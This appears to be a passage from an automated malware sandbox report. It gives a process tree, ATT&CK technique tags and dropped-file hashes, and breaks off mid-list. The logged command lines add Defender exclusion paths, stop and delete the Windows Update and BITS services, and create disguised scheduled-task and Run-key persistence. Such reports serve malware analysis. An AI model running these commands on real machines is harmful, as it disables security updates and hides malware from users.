    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:157676
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:157020

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{2be2cf60-1bea-4d0e-af7a-bf55a717c9fe}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:156964
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e0fe41ec-8ea8-4ff5-8acd-3841ba962488}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:157028

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1176

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:1816

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204
- C:\Users\Admin\AppData\Local\Temp\49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe
  "C:\Users\Admin\AppData\Local\Temp\49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1760
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:98752
  - - C:\Users\Admin\AppData\Local\Microsoft\ofg.exe
      "C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:99068
    - - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /C schtasks /create /tn \o5jbkg8hsq /tr "C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:99112
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn \o5jbkg8hsq /tr "C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        6⤵
        Creates scheduled task(s)
        
        PID:99136
  - - C:\Users\Admin\AppData\Local\Microsoft\test.exe
      "C:\Users\Admin\AppData\Local\Microsoft\test.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:99172
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        5⤵
        Loads dropped DLL
        
        PID:157452
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" & exit
        6⤵
        
        PID:157592
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:157216
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 99172 -s 58468
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:157564
  - - C:\Users\Admin\AppData\Local\Microsoft\brave.exe
      "C:\Users\Admin\AppData\Local\Microsoft\brave.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Drops file in Program Files directory
      PID:99232
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:157316
    - - C:\Windows\system32\cmd.exe
        
        cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:156964
      - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:157148
      - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:157264
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:124148
      - C:\Windows\system32\sc.exe
        
        sc stop bits
        6⤵
        Launches sc.exe
        
        PID:157340
      - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        6⤵
        Launches sc.exe
        
        PID:157460
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        6⤵
        
        PID:157576
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        6⤵
        
        PID:157600
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        6⤵
        Modifies security service
        
        PID:157604
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        6⤵
        
        PID:156700
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        6⤵
        
        PID:156900
    - - C:\Windows\system32\cmd.exe
        
        cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        5⤵
        
        PID:157028
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:157188
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:157292
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:157300
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:157332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:157084
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
        6⤵
        Creates scheduled task(s)
        
        PID:157536
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        5⤵
        Drops file in Windows directory
        
        PID:157356
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:157344
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        6⤵
        
        PID:157096
  - - C:\Users\Admin\AppData\Local\Microsoft\chrome.exe
      "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:108372
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:118168
    - - C:\Windows\SysWOW64\SCHTASKS.exe
        
        SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:124388
    - - C:\Windows\SysWOW64\SCHTASKS.exe
        
        SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:127316
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 108372 -s 212
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:127988
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 97412
    3⤵
    - Program crash
    PID:98792

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:480

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1517968651-2092998098-11033435451336955034-1475854881-10615691083615908952055488325"
1⤵
PID:157364

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-949633317738873849330403441-6776592642088842005-17062145593978728882654430"
1⤵
PID:156796

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-944285276-16817085968437711181045406924-2110669616511586374-184630835936273445"
1⤵
PID:157316

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-746622372-1044090952214035651-43639665-1020878393689368450-6800664191151043709"
1⤵
PID:157460

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1606568474145642508410346327518376782116290162115378998831273738131-1387800393"
1⤵
PID:157312

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-10220967201467824496-407034422-843424185-11686988281625875266514174349578764255"
1⤵
PID:1420

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
3.2MB

MD5
ae58e8058ae55a3dd3eefccb4a48be78

SHA1
09fc0b2194e8b8b5d690650057805b8966305f3e

SHA256
0af01618c8b68b42870b2fa8b0ee79ce961a3199cd8c006c7d1e770abb93030c

SHA512
fadcacb167576455ee3a1ac8e45d34c5d8aeb428490eb14572ecb8580622f5b4d82d46a9823ec0b6e7e0a4637749f8ffc35525ac7068f2236f358c353a447c99

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
3.2MB

MD5
ae58e8058ae55a3dd3eefccb4a48be78

SHA1
09fc0b2194e8b8b5d690650057805b8966305f3e

SHA256
0af01618c8b68b42870b2fa8b0ee79ce961a3199cd8c006c7d1e770abb93030c

SHA512
fadcacb167576455ee3a1ac8e45d34c5d8aeb428490eb14572ecb8580622f5b4d82d46a9823ec0b6e7e0a4637749f8ffc35525ac7068f2236f358c353a447c99

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
60KB

MD5
d15aaa7c9be910a9898260767e2490e1

SHA1
2090c53f8d9fc3fbdbafd3a1e4dc25520eb74388

SHA256
f8ebaaf487cba0c81a17c8cd680bdd2dd8e90d2114ecc54844cffc0cc647848e

SHA512
7e1c1a683914b961b5cc2fe5e4ae288b60bab43bfaa21ce4972772aa0589615c19f57e672e1d93e50a7ed7b76fbd2f1b421089dcaed277120b93f8e91b18af94

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
438B

MD5
04b8a7dc900306fea88d3b2e2a3f3681

SHA1
cc9c49aa5cea22c6bde7b4c599d42430fd86d72d

SHA256
aa7d87238c52431ff85f8d5f1ccb18b3c720ad1cd690f243df3329187e5df2df

SHA512
a965212cab35b8738b384ccb0e19f8b39bb98d6731a2cc5f940fd6b0fb53cd0cf62654d595fb3135b512896adb2b2dd2cc99bded9722b44d54f036fc4bf5b448

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
a67886227e89a6bfea6b1ae9f981f6cc

SHA1
3b3afdf7d8d48af612251795e834e56cb3b53aa6

SHA256
167c968aa075379af56c003cd48675c0f64eebb13ee44681290a8ebef1be0bb3

SHA512
9c66d5f815615a31ea7c13df01698c1d5644f8d5faafcff3605019c459519225c0b7726b9746c388f54def6fc175c6851609e4616ab5149f3885181d1d26a0fd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
55af408ae50dcc7849aaa1030d1f0e7a

SHA1
f503e1883c22d49d61dd74d1c2960c98854b0daa

SHA256
2419cb50a0dcbde3f4e94fcba49dd27d84994b97f666da2ccfd7da3fdab19d22

SHA512
18d294158b7b14ef0894e3f83a02257fc0885c51b33f4605b9342b23ed92b7de1d3ae14ff2235e66a09aea61cfe9776bed8f2acf0d8aef805d8aa0d82e1d2f48

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_FA7D89FF3F7E3B2FB6EEB355120CB669

Filesize
426B

MD5
e8d84e00cc9c2660d7dce52e0b5fdd8a

SHA1
cbb39df0ab6bcfaeaf279b4533e7ae71b816f9ba

SHA256
356d8ad404a819c21c810e5e7c7aba27f8dcb72669948a91545f1f52514e65dd

SHA512
f3453b3fa45e6c5205547566c6b5466423b626d61823f9c8ab0795a1ef688b7fc267a10bb335a9813296769b2f806db510b0db182e9e7d2bee24451f12319ab0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A

Filesize
252B

MD5
a295701d9db48ceccff876d2d345d0c7

SHA1
056b9911e964c1efa41408f484ff5d449b50edc2

SHA256
735eeb8c4d572a1106fb1a8682a9eecd910454f4fb5024927019fb97481520d7

SHA512
df56da4597cf9db2805e838f9d2ce50e6d107c5d66d323be47cad454765cddd9e6e1fd1b1f4df6242f0445aca6657043060d3d3316f6111b8e49c1f59a977ae3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\brave.exe

Filesize
3.2MB

MD5
872358b05cc08ca705a1a7592c23ecdf

SHA1
388dd6811a9459a2dbc78bdf38ef0477ca5b0704

SHA256
054174b77c43d2b1a97a1238282818dc2792535ec0e3b94102c58d9d9ffeba15

SHA512
bd12b7d87a172b1efeb1cf2bcf47d1594bb953dc6ac8bdce650f5d58ce818e74e5f90d82c7e4cfa9b39126cc6bc1323c1ba2f8f02b6be13f385ae524f0ac6e2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\brave.exe

Filesize
3.2MB

MD5
872358b05cc08ca705a1a7592c23ecdf

SHA1
388dd6811a9459a2dbc78bdf38ef0477ca5b0704

SHA256
054174b77c43d2b1a97a1238282818dc2792535ec0e3b94102c58d9d9ffeba15

SHA512
bd12b7d87a172b1efeb1cf2bcf47d1594bb953dc6ac8bdce650f5d58ce818e74e5f90d82c7e4cfa9b39126cc6bc1323c1ba2f8f02b6be13f385ae524f0ac6e2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ofg.exe

Filesize
7KB

MD5
b491f711272344f719ee13d98ff337bf

SHA1
f6f621d78adba380fd5da1e5b20e51b10e072d5f

SHA256
453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2

SHA512
fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\ofg.exe

Filesize
7KB

MD5
b491f711272344f719ee13d98ff337bf

SHA1
f6f621d78adba380fd5da1e5b20e51b10e072d5f

SHA256
453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2

SHA512
fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
88adc841d5e8d78f8ac70f062f38a254

SHA1
3bcad87370280c36e29890e8515be71e6eaf1daf

SHA256
79a1f14ed5557e622147e7c5f99ced282a17f259feaa744e1e1e577ba90526b4

SHA512
1010b1ec99dca29f0b641a0c31f89f518d33b3580e9f1780def809e3f4881fe69bd36b257d37e7ebe33f5974f415188442bb1ac589c48fd0992b2879b7aaaa6a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
88adc841d5e8d78f8ac70f062f38a254

SHA1
3bcad87370280c36e29890e8515be71e6eaf1daf

SHA256
79a1f14ed5557e622147e7c5f99ced282a17f259feaa744e1e1e577ba90526b4

SHA512
1010b1ec99dca29f0b641a0c31f89f518d33b3580e9f1780def809e3f4881fe69bd36b257d37e7ebe33f5974f415188442bb1ac589c48fd0992b2879b7aaaa6a

Download Submit
C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe

Filesize
7KB

MD5
b491f711272344f719ee13d98ff337bf

SHA1
f6f621d78adba380fd5da1e5b20e51b10e072d5f

SHA256
453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2

SHA512
fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f

Download Submit
C:\Users\Admin\AppData\Roaming\o5jbkg8hsq\svcupdater.exe

Filesize
7KB

MD5
b491f711272344f719ee13d98ff337bf

SHA1
f6f621d78adba380fd5da1e5b20e51b10e072d5f

SHA256
453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2

SHA512
fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
3.2MB

MD5
ae58e8058ae55a3dd3eefccb4a48be78

SHA1
09fc0b2194e8b8b5d690650057805b8966305f3e

SHA256
0af01618c8b68b42870b2fa8b0ee79ce961a3199cd8c006c7d1e770abb93030c

SHA512
fadcacb167576455ee3a1ac8e45d34c5d8aeb428490eb14572ecb8580622f5b4d82d46a9823ec0b6e7e0a4637749f8ffc35525ac7068f2236f358c353a447c99

Download Submit
\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
\ProgramData\sqlite3.dll

Filesize
1.1MB

MD5
1f44d4d3087c2b202cf9c90ee9d04b0f

SHA1
106a3ebc9e39ab6ddb3ff987efb6527c956f192d

SHA256
4841020c8bd06b08fde6e44cbe2e2ab33439e1c8368e936ec5b00dc0584f7260

SHA512
b614c72a3c1ce681ebffa628e29aa50275cc80ca9267380960c5198ea4d0a3f2df6cfb7275491d220bad72f14fc94e6656501e9a061d102fb11e00cfda2beb45

Download Submit
\Users\Admin\AppData\Local\Microsoft\brave.exe

Filesize
3.2MB

MD5
872358b05cc08ca705a1a7592c23ecdf

SHA1
388dd6811a9459a2dbc78bdf38ef0477ca5b0704

SHA256
054174b77c43d2b1a97a1238282818dc2792535ec0e3b94102c58d9d9ffeba15

SHA512
bd12b7d87a172b1efeb1cf2bcf47d1594bb953dc6ac8bdce650f5d58ce818e74e5f90d82c7e4cfa9b39126cc6bc1323c1ba2f8f02b6be13f385ae524f0ac6e2a

Download Submit
\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
\Users\Admin\AppData\Local\Microsoft\ofg.exe

Filesize
7KB

MD5
b491f711272344f719ee13d98ff337bf

SHA1
f6f621d78adba380fd5da1e5b20e51b10e072d5f

SHA256
453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2

SHA512
fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f

Download Submit
\Users\Admin\AppData\Local\Microsoft\ofg.exe

Filesize
7KB

MD5
b491f711272344f719ee13d98ff337bf

SHA1
f6f621d78adba380fd5da1e5b20e51b10e072d5f

SHA256
453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2

SHA512
fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f

Download Submit
\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
